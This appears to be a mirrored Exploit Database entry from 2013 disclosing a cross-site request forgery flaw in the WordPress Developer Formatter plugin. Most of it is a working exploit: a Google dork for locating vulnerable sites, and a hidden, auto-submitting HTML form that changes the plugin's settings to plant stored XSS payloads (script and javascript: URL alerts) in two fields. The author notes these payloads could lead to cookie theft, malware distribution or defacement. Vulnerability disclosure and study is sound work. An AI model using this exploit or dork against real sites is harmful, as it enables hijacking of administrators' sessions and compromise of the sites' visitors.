WordPress Plugin Developer Formatter – Cross-Site Request Forgery

• Exploit Database
• 10 阅读

• 作者： Junaid Hussain
  日期： 2013-01-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24294/

• ====================================================================================================================
  # Exploit Title: WordPress Developer Formatter CSRF Vulnerability
  # Google Dork: inurl:devformatter/devformatter.php
  # Date: 21/01/13
  # Author: Junaid Hussain -[ illSecure Research Group ] -
  # Contact: illSecResearchGroup@Gmail.com | Website: illSecure.com
  # Software Link: http://wordpress.org/extend/plugins/devformatter/
  # Vendor: http://wordpress.org/extend/plugins/devformatter/
  # Tested on: CentOS 5
  # Version: WordPress Version 3.5, Should work on all versions.
  
  ====================================================================================================================
  [#] Vulnerable Code
  Page: devinterface.php - Line: 46
   <form method="post" action="options-general.php?page=devformatter/devformatter.php">
  [#] no nonce given - Read: http://codex.wordpress.org/Function_Reference/wp_nonce_field
  ====================================================================================================================
  // CSRF Exploit:
  <html>
  <body onload="javascript:document.forms[0].submit()">
  <form method="post" action="http://[DOMAIN NAME]/wp-admin/options-general.php?page=devformatter/devformatter.php">
  <input name="usedevformat" style="display:none;" type="checkbox" checked/> 
  <input name="copyclipboartext" type="text" style="display:none;" value="&lt;/textarea&gt;<script>alert(/xss/)</script>"/>
  <input name="showtools" style="display:none;" type="checkbox" checked/> 
  <textarea name="devfmtcss" rows="6" cols="60" style="display:none;"> 
  	body {
  background-image: url('javascript:alert("XSS");') !important;
  }
  &lt;/textarea&gt;
   </form></html>
  ====================================================================================================================
  [#] copyclipboartext & devfmtcss are both vulnerable to persistent xss which could lead to cookie stealing,
  malware distribution or even a defacememnt.
  [#] Disclaimer: This exploit is for Research/Educational/Academic purposes only, 
  The Author of this exploit takes no responsibility for the way
  you use this exploit, you are responsible for your own actions.	
  ====================================================================================================================
  Original: http://illsecure.com/code/Wordpress-DevFormatter-CSRF-Vulnerability.txt